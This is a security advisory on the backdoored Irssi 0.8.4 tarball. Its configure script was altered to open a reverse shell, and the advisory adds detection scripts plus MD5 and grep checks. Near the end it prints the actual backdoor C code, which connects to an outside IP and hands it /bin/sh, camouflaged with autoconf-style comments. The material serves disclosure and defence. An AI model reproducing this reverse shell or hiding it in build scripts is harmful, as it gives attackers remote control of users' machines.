The main web site of the Irssi distribution has been hacked (the intrusion seems to have happened over two months ago but was only recently detected), and the tarball distribution of the package has been infected with a backdoor. All users of the IRC client should either upgrade, or download the latest version from the web site and confirm the MD5 checksum.
Credit:
The information has been provided by Martin Östlund.
What did the backdoor do? How to get rid of it?
The backdoored configure script spawns a new shell, connects to some server, and gives that server full shell access to the machine. Therefore, it might have done anything.
At least currently, the server it connects to does not do anything automatically. We would guess that it just waits for incoming commands. As for fixing it, that really depends on what it did, and we do not yet know that. So possibly it did nothing and you do not need to do anything, but possibly it ran a rootkit or whatever and you will need to reinstall your whole system. We would suggest doing that if you have any doubt.
In any case, you should make sure the process is no longer running, by killing all your /bin/sh processes or by rebooting.
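The process the backdoored configure leaves behind is a /bin/sh whose standard input, output and error are all a network socket (see the dup2() calls in the code further down). The following is an added example, not code from the advisory or from the Irssi project, of how to pick out such a shell on a Linux box by reading /proc rather than killing every sh blindly. It assumes Linux /proc semantics (fd symlinks that point at "socket:[inode]" for sockets) and the `readlink` utility; the comm names it accepts are an assumption.

```shell
#!/bin/sh
# Added example (not from the advisory): list shell processes whose fd 0, 1
# and 2 are all sockets, the footprint of a "dup2(s,0); dup2(s,1); dup2(s,2);
# execve(/bin/sh)" reverse shell. Linux-only: relies on /proc/<pid>/fd links.

# A /proc/<pid>/fd/N symlink target reads "socket:[12345]" for a socket,
# "/dev/pts/0" for a terminal, "pipe:[678]" for a pipe. Return 0 for a socket.
fd_target_is_socket() {
    case "$1" in
        socket:*) return 0 ;;
        *)        return 1 ;;
    esac
}

# Decide whether a process matches the pattern from its comm name and the
# targets of fd 0/1/2. The kernel sets comm from the basename passed to
# execve, so execve("/bin/sh") yields "sh" even if /bin/sh is a symlink;
# "bash" and "dash" are accepted as well (assumption, to catch direct use).
# Kept free of /proc access so it can be exercised on constructed input.
is_socket_shell() {
    comm="$1"; fd0="$2"; fd1="$3"; fd2="$4"
    case "$comm" in
        sh|bash|dash) ;;
        *) return 1 ;;
    esac
    fd_target_is_socket "$fd0" && fd_target_is_socket "$fd1" && fd_target_is_socket "$fd2"
}

# Walk /proc and report every matching process. Read errors are ignored
# because processes come and go while we scan; exit status is 0 either way.
list_socket_shells() {
    found=0
    for p in /proc/[0-9]*; do
        pid=${p#/proc/}
        comm=$(cat "$p/comm" 2>/dev/null) || continue
        fd0=$(readlink "$p/fd/0" 2>/dev/null || true)
        fd1=$(readlink "$p/fd/1" 2>/dev/null || true)
        fd2=$(readlink "$p/fd/2" 2>/dev/null || true)
        if is_socket_shell "$comm" "$fd0" "$fd1" "$fd2"; then
            cmd=$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null || true)
            echo "PID $pid: shell with stdin/stdout/stderr on a socket: $cmd"
            found=$((found + 1))
        fi
    done
    echo "$found suspicious shell(s) found"
}

# Usage: run as root so every process's fd directory is readable.
# list_socket_shells
```

Confirm any hit by looking at the socket's peer in `ss -tnp` (or `netstat -tnp`) before killing it; an interactive shell over ssh has its descriptors on a pty, not a socket, so it will not match.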
How do I know if I'm affected?
The backdoor was only in "configure"; the built binary itself is not backdoored. Here are some ways to find out whether you are affected:
* If you installed Irssi from a binary package, you are safe.
* Debian sources were not backdoored.
* Nightly source snapshots do not seem to be backdoored.
* CVS does not seem to be backdoored.
* The irssi-0.8.4.tar.bz2 file was not backdoored, only the .gz one.
* The FreeBSD port was not backdoored, as it used the .bz2 file.
* The Irssi/SILC client was not backdoored.
* If you let Irssi download the GLib sources from irssi.org, they are backdoored (the same configure modification as with Irssi).
* If you still have the sources, check with "grep SOCK_STREAM configure". If it returns any lines, the script is backdoored.
* The MD5 checksum of the originally released irssi-0.8.4.tar.gz is 57bf9d89638be3d377be211f0b0d7049. This is also the checksum of 0.8.4a.
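The two checks above (compare the tarball's MD5 against the published value, then grep the configure script for SOCK_STREAM) are easy to get wrong by hand, so here they are as an added shell example, not code from the advisory or from the Irssi project. The only page-specific value is the MD5 of the genuine irssi-0.8.4.tar.gz; the function names, the use of `md5sum`/`md5`, and the assumption that the tarball unpacks into a single top-level directory are mine.

```shell
#!/bin/sh
# Added example (not from the advisory): integrity checks for an Irssi source
# tarball. KNOWN_GOOD_MD5 is the value the advisory publishes for the genuine
# irssi-0.8.4.tar.gz; everything else here is assumption.

KNOWN_GOOD_MD5="57bf9d89638be3d377be211f0b0d7049"

# Print the MD5 of a file with whichever tool the host has
# (coreutils md5sum on Linux, md5 on BSD/macOS).
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d' ' -f1
    else
        md5 -q "$1"
    fi
}

# Return 0 if the file's MD5 equals the expected value, 1 otherwise.
verify_md5() {
    [ "$(file_md5 "$1")" = "$2" ]
}

# The advisory's own indicator: a genuine autoconf configure never opens a
# TCP socket, so any SOCK_STREAM reference means the script was tampered
# with. Return 0 (true) if the indicator is present.
configure_is_backdoored() {
    grep -q SOCK_STREAM "$1"
}

# Check an already unpacked source tree. Only the configure script matters:
# the advisory states the built binary itself is not backdoored.
check_source_tree() {
    cfg="$1/configure"
    [ -f "$cfg" ] || { echo "no configure script in $1" >&2; return 2; }
    if configure_is_backdoored "$cfg"; then
        echo "BACKDOORED: $cfg opens a network socket" >&2
        return 1
    fi
    echo "clean: $cfg"
}

# Check a downloaded .tar.gz: checksum first, then the configure inside it.
# The expected MD5 defaults to the advisory's value for irssi-0.8.4.tar.gz.
check_tarball() {
    tarball="$1"; expected="${2:-$KNOWN_GOOD_MD5}"
    if ! verify_md5 "$tarball" "$expected"; then
        echo "CHECKSUM MISMATCH: $tarball (got $(file_md5 "$tarball"), want $expected)" >&2
        return 1
    fi
    tmp=$(mktemp -d) || return 2
    tar -xzf "$tarball" -C "$tmp" || { rm -rf "$tmp"; return 2; }
    # Assumption: the archive unpacks into one top-level directory.
    topdir=$(ls -d "$tmp"/*/ | head -n 1)
    check_source_tree "$topdir"; rc=$?
    rm -rf "$tmp"
    return $rc
}

# Usage: check_tarball irssi-0.8.4.tar.gz
#        check_source_tree /path/to/unpacked/irssi-0.8.4
```

A checksum match only proves the file is the one the project published, which is exactly why the grep is still run afterwards: a compromised web site can publish a matching checksum next to a tampered tarball, whereas the SOCK_STREAM indicator holds regardless of where the checksum came from.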
What exactly was the backdoor?
These lines were found in the configure script:
    int s;
    struct sockaddr_in sa;
    switch(fork()) { case 0: break; default: exit(0); }
    if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
        exit(1);
    }
    /* HP/UX 9 (%@#!) writes to sscanf strings */
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(6667);
    sa.sin_addr.s_addr = inet_addr("204.120.36.206");
    if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
        exit(1);
    }
    dup2(s, 0); dup2(s, 1); dup2(s, 2);
    /* The GNU C library defines this for functions which it implements
       to always fail with ENOSYS. Some functions are actually named
       something starting with __ and the normal name is an alias. */
    { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }
In addition, the IP address was changed just yesterday, from 209.164.15.215.